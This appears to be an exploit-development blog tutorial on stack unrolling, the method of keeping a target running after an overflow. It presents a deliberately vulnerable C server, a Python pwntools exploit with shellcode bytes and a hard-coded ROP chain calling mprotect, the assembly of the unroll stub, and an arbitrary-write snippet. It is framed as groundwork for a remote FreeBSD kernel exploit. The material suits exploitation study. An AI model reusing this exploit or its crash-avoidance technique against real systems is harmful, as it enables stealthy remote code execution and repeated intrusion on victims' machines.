Stack unrolling

Hello.
In this post, I will talk about the stack unrolling technique, which is mostly used in kernel exploits.
The goal of stack unrolling is primarily to avoid a crash after a buffer has been overwritten: by returning to a calling function further up the stack, the target software can continue to run without a segmentation fault or a similar error.

This is mainly used in kernel exploits because a kernel exploit is often broken into multiple parts to achieve successful remote code execution in the case of a remote bug. We'll apply this technique in the case of a generic remote FreeBSD kernel exploit.

This allows us to overcome the limitation on payload size by sending multiple payloads separately.
I'm using Ubuntu Linux with gdb-peda, and ASLR is disabled.
Disabling ASLR on Ubuntu:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 
 
We use the vulnerable C server below for the demo.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
/* State shared by the server_* helpers. */
typedef struct server
{
    int socket_fd;             /* listening socket descriptor */
    struct addrinfo *addrinfo; /* address list filled in by getaddrinfo() */
} server_t;
#define PKT_SIZE 100
int server_init(server_t *server, char *port);
int server_bind(server_t *server);
int server_listen(server_t *server, int max_client);
int server_accept(server_t *server);
static void stack_two(char *packet);
static void stack_one(char *packet);
/**
 * Create the listening TCP socket and resolve the local address to bind to.
 *
 * Creates an AF_INET / SOCK_STREAM socket with SO_REUSEADDR enabled, then
 * resolves a passive address for `port` with getaddrinfo() and stores the
 * result in server->addrinfo.
 *
 * @param server  Server state to fill in; socket_fd and addrinfo are written.
 * @param port    Service name or port number string handed to getaddrinfo().
 * @return 0 on success, -1 if the socket could not be created or configured,
 *         or the non-zero getaddrinfo() error code if resolution failed.
 *         On failure no socket is left open: socket_fd is -1 and addrinfo
 *         is NULL.
 */
int server_init(server_t *server, char *port)
{
    int reuse = 1;
    int err;
    /* Designated initializer zeroes every other field (replaces bzero()). */
    struct addrinfo hints = {
        .ai_family = AF_INET,
        .ai_socktype = SOCK_STREAM,
        .ai_flags = AI_PASSIVE,
    };

    server->addrinfo = NULL;
    server->socket_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (server->socket_fd == -1)
    {
        perror("Failed to create socket");
        return -1;
    }

    if (setsockopt(server->socket_fd, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)) < 0)
    {
        perror("Failed to setsockopt socket");
        /* Do not leak the descriptor on the error path. */
        close(server->socket_fd);
        server->socket_fd = -1;
        return -1;
    }

    err = getaddrinfo(NULL, port, &hints, &server->addrinfo);
    if (err != 0)
    {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(err));
        close(server->socket_fd);
        server->socket_fd = -1;
        server->addrinfo = NULL;
        return err;
    }

    return 0;
}
/**
 * Bind the server socket to the address stored in server->addrinfo.
 *
 * @param server  Server state; socket_fd and addrinfo are read.
 * @return 0 on success, -1 if no address is available or bind() fails.
 */
int server_bind(server_t *server)
{
    const struct addrinfo *ai = server->addrinfo;

    /* addrinfo is NULL when address resolution never succeeded; fail
     * cleanly instead of dereferencing a null pointer. */
    if (ai == NULL)
    {
        fprintf(stderr, "Failed to bind to socket: no resolved address\n");
        return -1;
    }

    if (bind(server->socket_fd, ai->ai_addr, ai->ai_addrlen) == -1)
    {
        perror("Failed to bind to socket");
        return -1;
    }

    return 0;
}
/*
 * Put the server socket into the listening state.
 * max_client is handed to listen() as the backlog value.
 * Returns 0 on success; on failure reports through perror() and returns -1.
 */
int server_listen(server_t *server, int max_client)
{
    const int status = listen(server->socket_fd, max_client);

    if (status != -1)
    {
        return 0;
    }

    perror("Failed to listen to socket");
    return -1;
}
/*
 * Accept one client connection, read a single packet from it and hand the
 * packet to stack_one().
 *
 * Returns 0 once the packet has been processed, or -1 if accept() fails.
 * If recv() fails, the client and the listening socket are closed and the
 * process exits with status 6.
 *
 * NOTE(review): this function sits on the deliberately vulnerable demo path
 * and the accompanying write-up relies on clientAddr living in this stack
 * frame, so the code is intentionally left unchanged. Known issues:
 *  - client_fd is never closed on the success path (one descriptor leaks
 *    per connection);
 *  - clientAddrLen is an int, while accept() takes a socklen_t *;
 *  - recv() does not NUL-terminate buffer, yet it is printed with "%s";
 *  - a recv() return value of 0 is treated the same as received data.
 */
int server_accept(server_t *server)
{
/* Filled in by accept() with the address of the connecting client. */
struct sockaddr clientAddr;
int clientAddrLen = sizeof(struct sockaddr);
/* Receive buffer: 512 bytes. */
char buffer[256 * 2];
int client_fd, ret;
client_fd = accept(server->socket_fd, &clientAddr, &clientAddrLen);
if(client_fd == -1)
{
perror("Failed to accept client");
return -1;
}
printf("Client Connected\n");
ret = 0;
/* A single recv() call; at most sizeof(buffer) bytes are read. */
ret = recv(client_fd, buffer, sizeof(buffer), 0);
if(ret == -1)
{
perror("recv");
close(client_fd);
close(server->socket_fd);
exit(6);
}
printf("Here is the message: %s\n", buffer);
/* Pass the raw packet down the stack_one() -> stack_two() call chain. */
stack_one(&buffer[0]);
return 0;
}
/*
 * Copy a length-prefixed packet into a fixed-size local buffer and print it.
 *
 * The first byte of packet is read as an unsigned length (0..255) and twice
 * that many bytes are copied from packet into buffer_two.
 *
 * NOTE(review): intentionally vulnerable. The copy length (up to 510 bytes)
 * is never checked against PKT_SIZE (100), so memcpy() can write past the
 * end of buffer_two. This is the overflow the accompanying write-up
 * exploits; do not reuse this code outside the demo.
 */
static void stack_two(char *packet)
{
char buffer_two[PKT_SIZE];
unsigned char pkt_len = 0;
/* Length field: first byte of the packet, taken as-is from the sender. */
pkt_len = (unsigned char)(*packet);
printf("Packet len : %d\n", pkt_len);
/* Unchecked copy of pkt_len * 2 bytes into a PKT_SIZE-byte buffer. */
memcpy(buffer_two, packet, pkt_len * 2);
/* buffer_two is not explicitly NUL-terminated before being printed. */
printf("buffer_two : %s\n", buffer_two);
}
/*
 * Intermediate call level between server_accept() and stack_two(): forwards
 * packet unchanged to stack_two().
 */
static void stack_one(char *packet)
{
/* Never read or written in this function. NOTE(review): presumably kept
 * only to give this frame some size for the demo - confirm before removing. */
char buffer_one[PKT_SIZE];
stack_two(packet);
}
/*
 * Entry point: set up a listening server on the port given as argv[1] and
 * serve clients forever, one connection at a time.
 *
 * Returns EXIT_FAILURE if the port argument is missing or if any setup step
 * (init, bind, listen) fails; each step prints its own error message.
 * Failures of individual server_accept() calls are not fatal.
 */
int main(int argc, char *argv[])
{
    int err = 0;
    server_t server = {0};

    if (argc < 2)
    {
        fprintf(stderr, "Usage: %s <port>\n", argc > 0 ? argv[0] : "server-vuln");
        return EXIT_FAILURE;
    }

    /* Stop at the first setup step that fails instead of carrying on with
     * a half-initialised server. */
    err = server_init(&server, argv[1]);
    if (err == 0)
    {
        err = server_bind(&server);
    }
    if (err == 0)
    {
        err = server_listen(&server, 10);
    }
    if (err != 0)
    {
        return EXIT_FAILURE;
    }

    while (1)
    {
        server_accept(&server);
    }
    return 0;
}
view raw server-vuln.c hosted with ❤ by GitHub


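We have a buffer overflow vulnerability in the stack_two function. It takes the length used in the memcpy from the packet without checking it against the actual buffer size: the first byte of the packet (0-255) is doubled and used as the copy length, so up to 510 bytes can be copied into the 100-byte buffer_two.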
Compilation:
gcc -fno-stack-protector -o server-vuln server-vuln.c
./server-vuln 8080


Here is our exploit:
from pwn import *
from struct import pack
import sys
import os
def u8(x):
    """Pack the integer x (0..255) into a single unsigned byte."""
    return pack("B", x)
# Connect to the demo server on localhost, port 8080.
conn = remote('localhost',8080)
# Stack-unrolling shellcode (27 bytes); per the write-up these bytes are
# assembled from the unroll.asm listing.
shellcode = b"\x48\x83\xc4\x08"
shellcode += b"\x66\x83\x3c\x24\x02"
shellcode += b"\x75\xf5"
shellcode += b"\x81\x7c\x24\x04\x7f\x00\x00\x01"
shellcode += b"\x75\xeb"
shellcode += b"\x48\x83\xc4\x20\x5d\xc3"
print (len(shellcode))
length = len(shellcode)
# First byte is the length field read by the server, which copies twice
# this many bytes.
payload = u8(255)
# NOP padding sized so that padding plus shellcode is always 111 bytes.
payload += b"\x90"
payload += b"\x90" * (110 - length)
payload += shellcode
# NOTE(review): presumably lands on the saved rbp slot of the overflowed
# frame - confirm in gdb.
payload += pack("<Q", 0x4141414141414141)
# ROP chain. The addresses are hard-coded for one specific environment with
# ASLR disabled. NOTE(review): they appear to be libc gadget addresses -
# confirm against the libc build in use.
payload += pack("<Q", 0x00007ffff79e5b96) # pop rdx
payload += pack("<Q", 0x00007ffff79e5b96)
payload += pack("<Q", 0x00007ffff7b404ce) # mov rdi,rsp call rdx
payload += pack("<Q", 0x00007ffff7a3c6ed) # mov rax, rdi ; ret
payload += pack("<Q", 0x00007ffff79e5b96) # pop rdx ; ret
payload += pack("<Q", 0xfffffffffffff000)
payload += pack("<Q", 0x00007ffff7a21f35) # and rax, rdx ; movq xmm0, rax ; ret
payload += pack("<Q", 0x00007ffff7a22b0b) # pop rcx ; ret
payload += pack("<Q", 0x00007ffff7a07e6a)
payload += pack("<Q", 0x00007ffff7a7ef53) # mov rdi, rax ; call rcx
payload += pack("<Q", 0x00007ffff7a07e6a) # pop rsi ; ret
payload += pack("<Q", 0x0000000000001000)
payload += pack("<Q", 0x00007ffff79e5b96) # pop rdx ; ret
payload += pack("<Q", 0x7)
# NOTE(review): uncommented address; presumably mprotect, going by the
# write-up's description of the chain - confirm.
payload += pack("<Q", 0x7ffff7affae0)
payload += pack("<Q", 0x00007ffff7b146b5) # pop r10 ; ret
payload += pack("<Q", 0xa20 + 1)
payload += pack("<Q", 0x00007ffff7a20a4b) # add rdi, r10 ; jmp rdi
# Gadget notes kept by the author as a bare string literal (not executed).
"""
0x00000000000586ed : mov rax, rdi ; ret
0x00007ffff7a21f35 : and rax, rdx ; movq xmm0, rax ; ret
0x00007ffff79e5b96: pop rdx ; ret 0xfffffffffffff000
0x00007ffff7a07e6a pop rsi ; ret
0x00007ffff7a22b0b pop rcx ; ret
0x00007ffff7a7ef53 : mov rdi, rax ; call rcx
0x7ffff7a957c5 xor rax, rax ; ret
0x00007ffff7b146b5 : pop r10 ; ret 0xa20 [Offeset to buff]
0x00007ffff7a20a4b : add rdi, r10 ; jmp rdi
"""
# Send the whole payload in one write, then drop the connection.
conn.send(payload)
conn.close()
view raw stack-unroll.py hosted with ❤ by GitHub


First, let's run the exploit before explaining its internals.
                                                       Figure 1: The server running on port 8080
                                                         Figure 2: The actual exploit sending the payload multiple times

In general, the exploit uses ROP gadgets to make the stack executable, by taking the current value of RSP and calling mprotect. Our actual payload, which unrolls the stack, is located on the stack just before the ROP gadget addresses.

The shellcode used to unroll the stack is extracted from this assembly code
; Stack-unrolling stub: walk up the stack 8 bytes at a time until a two-part
; signature is found, then fix up rsp, restore rbp and return.
SECTION .text
global _start
_start:
; Advance rsp by one 8-byte slot.
add rsp, 0x8
; First signature: the 16-bit value 0x0002 at [rsp].
; NOTE(review): presumably the address-family field of the client sockaddr - confirm.
cmp WORD [rsp], 0x0002
; No match: keep walking.
jne _start
; Second signature: the 32-bit value 0x0100007f at [rsp + 4]
; (bytes 7f 00 00 01 in memory, i.e. 127.0.0.1).
cmp DWORD [rsp + 4], 0x100007f
; No match: keep walking.
jne _start
; Both matched: skip 0x20 bytes from the matched location.
add rsp, 0x20
; Restore the frame pointer from the stack, then return.
pop rbp
ret
view raw unroll.asm hosted with ❤ by GitHub


The role of the shellcode is to:
- Increment the value of RSP
- Check for the first signature on the stack
- Jump back to the start if it is not equal
- Check for the second signature
- Jump back to the start again if it is not equal
- Adjust the value of RSP
- Pop RBP
- Return (ret)

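The signature in our case is the local IP address located on the stack in the function server_accept. This function declares a struct sockaddr, which is used to
store the IP address of the connected client. Concretely, the shellcode looks for the 16-bit value 0x0002 followed, four bytes after its start, by 127.0.0.1 as it is stored in memory (0x0100007f when read as a little-endian DWORD).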

The shellcode walks the stack from the stack_two stack frame upward until it matches the signature. Because we are exploiting the server from localhost, we look for the local IP address as the signature on the stack.
If we were exploiting this from a remote machine, we would just look for our own IP address on the stack.


                                              Figure 3: Backtrace, frame for server_accept


In our case:
&clientAddr: 0x7fffffffdd20
rbp at 0x7fffffffdd40 

The difference is 0x20.
Once the signature is matched, we add 0x20 to the current RSP and, as we want to return to the main function, we pop rbp and execute ret.

The server can continue its normal execution.
In one image.

Now you can add an additional payload before the stack unrolling payload, such as an arbitrary write primitive.
 
        mov rax, destaddr
        mov rbx, data
        mov QWORD [rax], rbx

        
Using this, you can send multiple 8-byte writes separately over the network while keeping the server running without any crash.

We'll apply this to the generic remote FreeBSD kernel exploit.




Comments